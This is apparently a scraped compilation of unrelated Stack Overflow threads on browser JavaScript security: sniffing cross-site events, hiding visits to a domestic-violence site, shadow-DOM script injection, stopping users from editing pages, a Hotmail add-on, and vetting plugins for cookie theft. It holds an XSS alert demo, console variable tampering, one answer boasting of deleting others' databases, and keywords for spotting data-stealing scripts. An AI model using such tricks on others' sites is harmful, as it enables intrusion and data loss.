overflow community,
I've read several posts trying to solve the problem, but they dont answer my question.
Is there any legal way to find out what events (?) another site sends?
I dont ask because of illigal buissness and i am ready to find out more myself as soon as i know what i realy have to look for in terms of topic and methods.
In particular its about advertising and finding out if someone registered on another via a referal link. Like a sign that is sent as soon as the registration (on the other site which is not mine) is completed.
I want to find this out during the visit of the client on my site.
I just need to know if such a thing is legally possible and what JS topics i should give a go to find out more.
I hope my post is comprehensible enough. :)
edit: It's not about global variables.
You can use your browser's developer tools to see what's happening behind your back while you're visiting a web page (I recommend Firebug in Firefox). Alternatively, you may use a network spoofer like Wireshark to capture the traffic from the browser and analyze it in any way.
It's all up to you to find the information you think is relevant inside it in URLs, in request headers and bodies, etc. In your case, this would include script generated content and referal codes that may help keeping track of a user's browsing history across domains.
You don't really need Javascript knowledge to do this, but you need some basics about networking protocols.
This is probably as illegal as using a text editor, but just ask your lawyer if you're unsure :D
Related
Situation:
I have a sensitive website about domestic violence with an EXIT button that directly links to Google. So that anyone visiting that website can quickly jump to Google if the visitor feels unsafe or uncomfortable.
I would love to be able to clear any references to this website from bot the history list and the back button functionality. Basically, remove any proof of visiting that website. Keep in mind that not all people know how to browse anonymous and some people just cannot even get out of the house to browse the internet. Yes, this scenario is for seriously bad situations.
I've tried using location.replace instead of regular links to keep them from being saved into the history, but they just keep being saved in the history.
I've also tried to use browser.history.deleteUrl({url:"https://thewebsite"}), but this gives error on browser being undefined.
Is this even possible from a website? Or are there other options?
Thanks for thinking with me!
As you state in the question, you can use window.location.replace() to prevent your site from appearing in the window’s history (back button). Of course, this only works if your site had only one entry in the window’s history to begin with.
As you also state, there is a bigger problem: this does not prevent the site from appearing in the browser’s history. I believe you cannot solve this problem with scripts on your website: you need some external solution, like a browser extension.
(This does not really answer your question, but you could try using URLs and titles that disguise the nature of your site. I have heard of that being done with this sort of resource.)
In response to my idea of disguises, someone asked for examples and asked about discoverability. I was referring to the Aspire News App, featured on Dr Phil’s TV show. On that show, they made a big deal out of not showing what the app looked like, to avoid tipping off abusers. They also said the app is disguised as an ordinary app.
When I was researching this answer, I learned that disguises are indeed a terrible idea. I had no trouble finding information about the app online, and one review said the app is “pointless” because “with all of the media cpverage this app has gotten sbusers know exactly what it is and what to look for”.
I also learned that the app still had a fundamental security flaw 7 years after it was released. This shows that even supposedly reputable apps, dealing with sensitive matters, cannot be trusted. And perhaps it means that supposedly reputable websites looking to hide themselves from the browser’s history cannot be trusted either.
I'm not a JS programmer. I don't have enough skill to test it myself, so asking for help.
Is it possible to inject script or HTML tag into shadow_root element to check for holes on web?
For example <script>alert("alert");</script>
Maybe something else like by using <content>?
Main question: Is it possible or not?
And additional question: How?
According to what I could dig up in comments, you want to know if your users can inject code in your website pages. The answer is yes, the user has all the rights to play with the DOM in front of him. The easy way is by simply opening your favorite browser's developers' tools.
Do it yourself... Open your developer's tools window here, reach the console and write
document.write("<script>alert(\"alert\");</script>");
As you can see, you can change anything even directly on StackOverflow. But that causes absolutely no harm to others, just you. While you can do that on SO does mean that it is insecure at all! It is just that your browser has full control on what it received...
Now, the question should be more how can I detect possible points in my application where such injection can be harmful.
The answer is simple, never trust client input. The server should always validate the inputs, and make sure there is no database injection possible. When displaying user provided content, one should also make sure there is no hidden code tag that would be ran by the browser of the users looking at the webpage.
StackOverflow is not suited for this kind of knowledge sharing. I suggest you read about website security in general and then find more in depth resources related to your technology stack and the usage you have with your users' input.
Also, if you are asking this for a real job task you have been given. The most important thing to do would be to tell your manager you are not fit for the task. Not because you lack the talent, but because you lack the knowledge. This shows that you are smart enough to see the task as very important (security IS very important) and you are not willing to play with the company's reputation.
See workplace.stackexchange.com if you'd like to know how to best explain that to your superiors.
I would like to know if there is a way to prevent an html page with jQuery or javascript to be modified by the user to change its behavior.
A user can modify it using tools such as FireBug or the Google Chrome developer bar to hide or show divs, add event listeners to page elements and so on.
I've seen some web pages showing a blocking div when the page is loaded and a pop-up telling to answer some question. If you answer it, the div hides and you can see the page normally.
But if you try to hide the blocking div using FireBug, the page reloads and there is no way to see the page correctly if you don't ansewer the question asked in the pop-up.
I want to know how could I prevent user from doing such things.
Thanks a lot.
It is not possible (which is a very good thing).
To defeat the method described in the question:
You can use the keyboard shortcuts to the console/tools (Ctrl+Shift+I in Chrome)
You can use the resource/net panel to see the source
You can see it at any other level, e.g. Fiddler
You can use a bookmarklet for easier access
No, you can't prevent people seeing or modifying your source/script if they want to...the ones you most want to prevent are the most able to circumvent any deterrent (and that's all anything you do is, a deterrent, not a stop) you put in place.
The only way to do it (in my opinion) is not have the page content load until the user does your desired action. After he answers the question (or whatever) you send an AJAX request for the content (of course, as thejh said, you should also validate the answer on the server, preferably in the same request). So you load page header, banners and anything not critical, but the actual content (say an article on a blog) should not be loaded until the user does your action.
Everything that a user's browser receives belongs to the user, so you can't enforce anything on that.
For sure you can't prevent anybody from doing what he wants to, but you can make changes more difficult.
Take a look at the DOMEvents, especially the Mutation-Events.
Those give you the ability to see when something has changes(attributes, removed/inserted nodes, data in textnodes ...). For example you could build a function that watches some special attributes you would'nt have to get changed and reload the page, if this happens.
As others have already said, it isn't possible to control what the end user does with data you've sent them.
It may be possible to detect the console object that Firebug and others use, but what can your site do with that information once you've got it? You can't disable firebug or prevent it from being used, or even know whether it has been used.
The bottom line is that once the web page and javscript code have been sent to the browser, it is out of your control.
The closest you can get to what you want is to move some of your code out of Javascript and to the server, where it will be untouchable by the user. However you'll still have to have some client-side code, which will still be at the mercy of malicious users.
The other alternative is to move to Flash or something similar, where the end user doesn't have direct access to the code or the object model. This has it's own downsides though, and you'd be bucking the trend, which is to move away from Flash toward HTML5 and Javascript.
It's impossible. When you send code to the client, the client can look at it and modify it. Only code that runs on your server is protected aganist that.
I don't think it's possible to do that unless you can make sure (or force) users to use browsers that don't have developer tool.
Use ajax to get remote information don't send the user all the information such as answers to polls etc get the answer after he picked a choice from the server using ajax for example. Client-side validation is never a good thing hell thats how I used to delete other stupid people's databases due to that unless people learn properly how things REALLY work they should get taught the hard way such as losing everything in a case of root access vulnerability.
I don't know why HTML has to be blocked it wasn't blocked since browsers came out he'll I could make my own browser with a socket and get HTML transfered right to some textbox and see it in my favorite notepad/editor etc..
As for javascript you can simply send javascript commands in browser address bar (how convenient of browsers in supporting hackers hehe but it's also used for inter-op communication with other technologies such as flash so it has a evil/good side to it as everything.)
If you didn't know you can just do
javascript: alert('hi');
or if your javascript game or whatever has globally scoped variables you can modify em easily
javascript: score=9999;damage=99999;
etc etc like i said it's all good it weeds out the bad programmers and gets em fired or teaches em a lesson in the future.
I've seen many big sites still fall to a SIMPLE XSS attack (Cross-site scripting) which is just baffling how these programmers get a job, I'd do a better interview or some shit it's ridiculous
I am new to Add-on development.
I am writing a Firefox extension for Hotmail using XUL tutorial. My knowledge of Javascript is pretty limited. My Firefox extension must do the following:
When the user opens a received message in MSN Hotmail to read it, locate and read the sender's email address.
Verify whether this email address is on a list. The list is stored in a simple text file in the local file system. The Add-on must read the list into memory. (I've read this is difficult with Javascript due to security concerns).
Depending on whether the address is in the list, modify the appearance of the "sender" field (I was thinking of changing the background color to green if it exists and red if it does not). The list is supposed to be a group of "secure" senders.
I don't want to use other Add-ons like Greasemonkey, since I believe it would be overkill and I want to learn how this would be done behind curtains.
Any general guides or pointers to specific documents which would help me understand how to achieve all this would be REALLY appreciated.
Which mechanism is best to perform the text-file-reading part? I've read about FileReader objects, or fopen() function, XMLHttpRequest(), and I am confused which is the best route. The file is guaranteed to be a simple text stored in the local filesystem.
I have been looking through the documentation and so far I have only a limited Add-on with a listener that can display a message when a page is loaded. If somebody can help me narrow my search I would be grateful.
Thanks and regards!
You have a couple of questions in there.
The best place to reference when developing an addon is MDN. You may also find help here on Stackoverflow's previous answers, and probably the best way to learn is to find an addon that does something similar to what you are doing, see the source code and see how they did it.
For reading/writing to a file, you can check this question on that matter.
Having that, you have to make sure you are on the desired page. You can get the current tab url with:
gBrowser.currentURI.spec
Then you see if the element that you are trying to style is on the page (meaning you are on the message window), and then you style it they way you want.
Hope this gives you some idea, but to get better and faster answers for next time, try to isolate a problem and ask a specific question about it. The scope of this question is a bit broad.
I am usually downloading several jQuery plugings.
How can I check whether the script is stealing any information (such as user cookie, session id..) and sending to its developer's server?
In php, we are checking backdoor scripts by looking for some functions (system, passthru, shell_exec, etc). Is there any such type of function in JavaScript to connect to its developers site?
Obviously, your first step should be to read the code. There are a number of tell-tale signs you can look for, including looking for URLs in the code, and any encrypted code.
Of course, some code may be too complex to make this a realistic suggestion, particularly if it's been minified and obfuscated, but it should be possible to scan through it. If it is doing anything like this, it'll be using the same functions it uses to communicated with your own site (ie jQuery's ajax functions), so you won't see specific function calls that raise suspicion, but suspect URLs in the code should be checked out, and you should definitely avoid encrypted code (obfuscated is generally okay, but not encrypted).
Secondly, search the internet for other people commenting about the plugin. If there is anything untoward happening, its likely that other people will have noticed it. Avoid using plugins that don't have enough users to get any comments one way or the other.
Finally, use a tool like Firebug to watch for HTTP requests that occur while you're using a site containing the plugin. If it's communicating with base, it can't hide from you; the browser's debugging tools will happily show you what you need to know.
Hope that helps.
I don't think you can do anything else than read the whole code, and check if it is stealing anything.
Another thing you could do, is to search in the codes after words like 'document.cookie' and 'navigator' and other things that are necesary for stealing information.